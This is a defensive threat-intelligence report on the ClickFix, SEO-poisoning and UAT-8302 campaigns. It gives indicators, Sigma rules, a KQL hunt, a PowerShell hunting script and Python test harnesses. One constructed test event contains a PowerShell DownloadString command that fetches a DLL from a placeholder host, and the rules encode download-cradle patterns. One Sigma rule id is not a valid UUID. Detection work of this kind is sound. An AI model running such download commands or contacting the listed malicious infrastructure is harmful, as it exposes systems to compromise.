Threat Summary
Recent OTX pulses indicate a highly active threat landscape with several distinct, aggressive campaigns.
- ClickFix Evolution: The "BackgroundFix" campaign uses a ClickFix social-engineering lure that masquerades as an image-editing tool. It hijacks the user's clipboard to invoke finger.exe, a legacy Windows utility, as a proxy that fetches the CastleLoader payload, which in turn drops NetSupport RAT and CastleStealer.
- SEO Poisoning & TDS: A large-scale malware distribution ecosystem is impersonating legitimate open-source tools (Ghidra, dnSpy, SpiderFoot). The operation uses CloudFront-hosted JavaScript for click hijacking, redirecting users to a Traffic Distribution System (TDS) that delivers SessionGate, RemusStealer, and AnimateClipper.
- UAT-8302 APT Campaign: A China-nexus APT group is actively targeting government and telecommunications sectors in Japan and Russia. It uses custom malware families such as NetDraft, CloudSorcerer v3, and FringePorch, and exploits specific CVEs (e.g., CVE-2025-0994) for initial access.
Collectively, these threats pose a high risk of credential theft, remote access takeover, and targeted espionage.
Threat Actor / Malware Profile
ClickFix (BackgroundFix)
- Distribution: Fake image-editing tools; "Verify you are human" social engineering.
- Payload Behavior: Uses clipboard hijacking to execute finger.exe, which retrieves CastleLoader.
- C2/Persistence: Drops NetSupport RAT (C2) and CastleStealer (credential theft).
Unknown Actor (TDS Ecosystem)
- Distribution: SEO poisoning of legitimate software downloads; click hijacking via CloudFront.
- Payload Behavior: Downloads SessionGate (session hijacking), RemusStealer (info stealer), and AnimateClipper (crypto clipper).
- C2 Communication: Handoffs via strict TDS gating (first-visit checks, anti-bot).
UAT-8302
- Distribution: Exploitation of vulnerabilities (CVE-2025-0994, CVE-2025-20333).
- Payload Behavior: Deploys .NET-based backdoors (NetDraft) and CloudSorcerer v3 for reconnaissance and data exfiltration.
- Targets: Government, telecommunications, and technology sectors in Japan and Russia.
IOC Analysis
The intelligence dump provides actionable indicators across multiple vectors:
- Domains & IPs: Infrastructure tied to the TDS (guiformat.com, forestoaker.com) and to ClickFix (trindastal.com, poronto.com). IPs such as 194.150.220.218 serve as delivery nodes.
- File Hashes: SHA256 hashes for CastleLoader, RemusStealer, and UAT-8302 payloads; these should be blocked in EDR solutions.
- CVEs: CVE-2025-0994, CVE-2025-20333, and CVE-2025-20362 are critical for patch management against UAT-8302.
- Operationalization: SOC teams should ingest these IOCs into SIEM correlation engines and blocklist the domains immediately at the firewall/proxy level.
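The operationalization step above glosses over two details that decide whether an IOC match actually fires: domains must match as name suffixes (a subdomain of a listed domain is a hit, a look-alike such as nottrindastal.com is not), and hashes must be compared case-insensitively because tools such as Get-FileHash emit uppercase hex. The following is an added example (not code from the original report) that applies the report's own domain, IP and hash IOCs to a constructed proxy log; the log format and every log line are assumptions made for the demo.

```python
# Added example (not part of the original report): normalise the report's
# network and file IoCs and match them against constructed proxy-log lines
# and file hashes, the way a SIEM ingest step would. Domains are matched on
# name suffix, so a subdomain of a listed domain is caught while a look-alike
# such as "nottrindastal.com" is not. All log lines below are constructed.
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import urlsplit

# IoCs as listed in the report above
IOC_DOMAINS = {"trindastal.com", "poronto.com", "guiformat.com", "forestoaker.com"}
IOC_IPS = {"194.150.220.218", "217.156.122.75"}
IOC_HASHES = {
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886",
}


@dataclass(frozen=True)
class Hit:
    line_no: int     # 1-based index into the log
    kind: str        # "ip" or "domain"
    indicator: str   # the IoC that matched


def host_of(url: str) -> str:
    """Lowercase host part of a URL or bare host, port and trailing dot removed."""
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower().rstrip(".")


def domain_match(host: str, iocs: Iterable[str]) -> Optional[str]:
    """Return the IoC domain that host equals or is a subdomain of, else None."""
    for d in iocs:
        if host == d or host.endswith("." + d):
            return d
    return None


def scan_proxy_log(lines: Iterable[str]) -> List[Hit]:
    """Match constructed log lines ("ts client_ip dest_ip url status") against the IoCs."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed line; a real pipeline would count and surface these
        dest_ip, url = parts[2], parts[3]
        if dest_ip in IOC_IPS:
            hits.append(Hit(n, "ip", dest_ip))
        d = domain_match(host_of(url), IOC_DOMAINS)
        if d is not None:
            hits.append(Hit(n, "domain", d))
    return hits


def hash_matches(sha256: str) -> bool:
    """Case-insensitive hash check; Get-FileHash and many EDRs emit uppercase hex."""
    return sha256.strip().lower() in IOC_HASHES


# Constructed proxy log: TEST-NET addresses plus the report's IoCs
SAMPLE_LOG = [
    "2026-06-04T10:00:01Z 10.0.0.5 93.184.216.34 https://example.com/index.html 200",
    "2026-06-04T10:00:02Z 10.0.0.5 194.150.220.218 http://194.150.220.218/index.html 200",
    "2026-06-04T10:00:03Z 10.0.0.7 203.0.113.9 https://nottrindastal.com/ 200",
    "2026-06-04T10:00:04Z 10.0.0.8 203.0.113.10 http://guiformat.com:8081/download/setup.exe 200",
    "2026-06-04T10:00:05Z 10.0.0.9 203.0.113.11 https://cdn.forestoaker.com/app.js 200",
    "garbage line",
]

if __name__ == "__main__":
    for h in scan_proxy_log(SAMPLE_LOG):
        print(f"line {h.line_no}: {h.kind} IoC {h.indicator}")
```

On the sample log the matcher flags line 2 on the IP alone (the URL host is the IP, not a listed domain), line 4 on guiformat.com despite the non-standard port, and line 5 on the forestoaker.com subdomain, while the nottrindastal.com look-alike on line 3 is correctly ignored; the same suffix logic is what a KQL `in` comparison on RemoteUrl does not give you.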
Detection Engineering
```yaml
title: Potential ClickFix Activity via finger.exe
id: 8f2a1b3c-4d5e-6f78-9a0b-1c2d3e4f5a6b
description: Detects execution of finger.exe, which is abused by ClickFix campaigns to retrieve payloads via clipboard manipulation.
status: experimental
author: Security Arsenal
date: 2026/06/04
references:
    - https://otx.alienvault.com/pulse/12345678
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\finger.exe'
    condition: selection
falsepositives:
    - Legitimate admin usage (rare)
level: high
---
title: Suspicious TDS Download via Non-Standard Ports
id: 9c3d2e1f-5g6h-7i8j-0k1l-2m3n4o5p6q7r
description: Detects downloads of executables or scripts from non-standard HTTP ports often associated with Traffic Distribution Systems (TDS) as seen in SEO poisoning campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/04
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        # Sigma has no 'between' modifier; |gte sets the lower bound and TCP ports already top out at 65535
        DestinationPort|gte: 1000
        Initiated: 'true'
    filter_standard:
        DestinationPort:
            - 443
            - 80
            - 8080
    condition: selection and not filter_standard
falsepositives:
    - Legitimate business applications on custom ports
level: medium
---
title: UAT-8302 APT CloudSorcerer Pattern
id: 0a1b2c3d-4e5f-6a7b-8c9d-0e1f2a3b4c5d
description: Detects potential CloudSorcerer component activity based on specific process injection patterns and suspicious PowerShell usage observed in UAT-8302 campaigns.
status: experimental
author: Security Arsenal
date: 2026/06/04
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
        CommandLine|contains|all:
            - 'downloadstring'
            - 'http'
            - '.dll'
    condition: selection
falsepositives:
    - Administrative scripts
level: high
```
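Before shipping Sigma rules to a backend it helps to see their selection logic fire on concrete events. The block below is an added example (not from the original report or the Sigma project) that reimplements the logic of the three rules above in plain Python and runs it over constructed events shaped like Sysmon process-creation and network-connection records. It mirrors two Sigma semantics the rules depend on: string modifiers such as endswith and contains|all compare case-insensitively, and the port bound is a numeric gte comparison. The event schema and every event are assumptions made for the demo.

```python
# Added example (not part of the original report): a minimal evaluator for
# the three Sigma rules above, run over constructed Windows events. Field
# names follow the Sigma windows process_creation / network_connection
# taxonomy (Image, CommandLine, DestinationPort, Initiated); the events
# themselves are constructed and use TEST-NET addresses.
from typing import Callable, Dict, Iterable, List, Tuple

Event = Dict[str, object]


def image_endswith(ev: Event, suffixes: Iterable[str]) -> bool:
    """Sigma 'Image|endswith' with a list: case-insensitive, any value matches."""
    image = str(ev.get("Image", "")).lower()
    return any(image.endswith(s.lower()) for s in suffixes)


def cmdline_contains_all(ev: Event, needles: Iterable[str]) -> bool:
    """Sigma 'CommandLine|contains|all': every needle must appear, case-insensitively."""
    cl = str(ev.get("CommandLine", "")).lower()
    return all(n.lower() in cl for n in needles)


def rule_clickfix_finger(ev: Event) -> bool:
    """Potential ClickFix Activity via finger.exe."""
    return ev.get("category") == "process_creation" and image_endswith(ev, ["\\finger.exe"])


def rule_tds_nonstandard_port(ev: Event) -> bool:
    """Suspicious TDS Download via Non-Standard Ports: selection and not filter_standard."""
    if ev.get("category") != "network_connection":
        return False
    port = int(ev.get("DestinationPort", 0))
    initiated = str(ev.get("Initiated", "")).lower() == "true"
    selection = initiated and port >= 1000          # DestinationPort|gte: 1000
    filter_standard = port in (80, 443, 8080)
    return selection and not filter_standard


def rule_uat8302_cloudsorcerer(ev: Event) -> bool:
    """UAT-8302 APT CloudSorcerer Pattern."""
    return (ev.get("category") == "process_creation"
            and image_endswith(ev, ["\\powershell.exe", "\\cmd.exe"])
            and cmdline_contains_all(ev, ["downloadstring", "http", ".dll"]))


RULES: Dict[str, Callable[[Event], bool]] = {
    "Potential ClickFix Activity via finger.exe": rule_clickfix_finger,
    "Suspicious TDS Download via Non-Standard Ports": rule_tds_nonstandard_port,
    "UAT-8302 APT CloudSorcerer Pattern": rule_uat8302_cloudsorcerer,
}


def evaluate(events: Iterable[Event]) -> List[Tuple[int, str]]:
    """Return (event index, rule title) for every rule that fires on each event."""
    alerts: List[Tuple[int, str]] = []
    for i, ev in enumerate(events):
        for title, fn in RULES.items():
            if fn(ev):
                alerts.append((i, title))
    return alerts


# Constructed events; 203.0.113.0/24 is TEST-NET-3
SAMPLE_EVENTS: List[Event] = [
    {"category": "process_creation", "Image": r"C:\Windows\System32\finger.exe",
     "CommandLine": "finger.exe"},
    {"category": "process_creation",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://203.0.113.7/x.dll')"},
    {"category": "process_creation", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"category": "network_connection", "Image": r"C:\Program Files\App\app.exe",
     "DestinationPort": 8080, "Initiated": "true"},
    {"category": "network_connection", "Image": r"C:\Program Files\App\app.exe",
     "DestinationPort": 8443, "Initiated": "true"},
    {"category": "network_connection", "Image": r"C:\Program Files\App\app.exe",
     "DestinationPort": 443, "Initiated": "true"},
    {"category": "network_connection", "Image": r"C:\Windows\System32\svchost.exe",
     "DestinationPort": 49152, "Initiated": "false"},
]

if __name__ == "__main__":
    for idx, title in evaluate(SAMPLE_EVENTS):
        print(f"event {idx}: {title}")
```

Running it shows event 0 firing the finger.exe rule, event 1 firing the UAT-8302 rule even though the command line spells "DownloadString" in mixed case, and event 4 firing the TDS rule purely because a legitimate-looking application connected to port 8443. That last hit is the point to notice: as written, the TDS rule matches almost every initiated outbound connection above port 1000 other than 8080, so it is a hunting query to scope further (for example by Image path or by joining against the IOC list) rather than an alert to page on.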
```kql
// Hunt for ClickFix and TDS Indicators
let IOCs_Domains = dynamic(["trindastal.com", "poronto.com", "guiformat.com", "forestoaker.com"]);
let IOCs_IPs = dynamic(["194.150.220.218", "217.156.122.75"]);
let IOCs_Hashes = dynamic(["bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92", "87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886"]);
// Process Creation Hunt
DeviceProcessEvents
| where (FileName =~ "finger.exe" or ProcessCommandLine has_any ("finger.exe", "BackgroundFix"))
    or SHA256 in (IOCs_Hashes)
| project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, SHA256, InitiatingProcessAccountName
| union (
    // Network Hunt: RemoteUrl may carry a full URL or a subdomain, so match with has_any
    // rather than an exact 'in' comparison, which would miss both
    DeviceNetworkEvents
    | where RemoteUrl has_any (IOCs_Domains) or RemoteIP in (IOCs_IPs)
    | project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName
)
| order by Timestamp desc
```
```powershell
# IOC Hunt Script for ClickFix, TDS, and UAT-8302
# Requires Admin Privileges
$MaliciousHashes = @(
    "bde21d8be65d31e1c380f2daae2f73c79f3e1f4bca70fb990db6fdf6c3768c92",
    "ed391a16389234f9ebb6727711baaf3e068d7f77c465708fa3e8b7d0565d7fb9",
    "87361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886",
    "fb6cebadd49d202c8c7b5cdd641bd16aac8258429e8face365a94bd32e253b00"
)
# Domain list kept for network-side checks; not used by the file and task checks below
$MaliciousDomains = @("trindastal.com", "poronto.com", "guiformat.com", "forestoaker.com")

Write-Host "[+] Hunting for Malicious File Hashes..."
$PathsToScan = @("C:\Users\", "C:\ProgramData\", "C:\Windows\Temp")
foreach ($Path in $PathsToScan) {
    if (Test-Path $Path) {
        # -File skips directories, which Get-FileHash cannot hash
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            try {
                $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction Stop).Hash
                # -contains is case-insensitive, so the uppercase hex from Get-FileHash matches the lowercase list
                if ($MaliciousHashes -contains $hash) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
                }
            } catch {
                # Ignore locked files or access errors
            }
        }
    }
}

Write-Host "[+] Checking for Suspicious Scheduled Tasks (Persistence)..."
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } |
    ForEach-Object {
        $TaskName = $_.TaskName
        $Action = $_.Actions.Execute
        # Named $TaskArgs rather than $Args, because $args is a PowerShell automatic variable
        $TaskArgs = $_.Actions.Arguments
        if ($TaskArgs -match "http" -or $TaskArgs -match "downloadstring") {
            Write-Host "[!] SUSPICIOUS TASK: $TaskName" -ForegroundColor Yellow
            Write-Host "    Action: $Action $TaskArgs"
        }
    }
Write-Host "[+] Hunt Complete."
```
Response Priorities
- Immediate:
  - Block all listed IOCs (Domains, IPs, Hashes) at the firewall, proxy, and EDR levels.
  - Initiate a hunt for finger.exe process executions across the enterprise (legitimate use is unlikely).
- 24 Hours:
  - Conduct credential audits and force password resets for privileged accounts if RemusStealer or CastleStealer activity is suspected.
  - Review web proxy logs for connections to the identified TDS domains and CloudFront URLs.
- 1 Week:
  - Patch systems against CVE-2025-0994, CVE-2025-20333, and CVE-2025-20362 to mitigate UAT-8302 exploitation.
  - Implement strict allow-listing for software installation sources to prevent SEO poisoning delivery.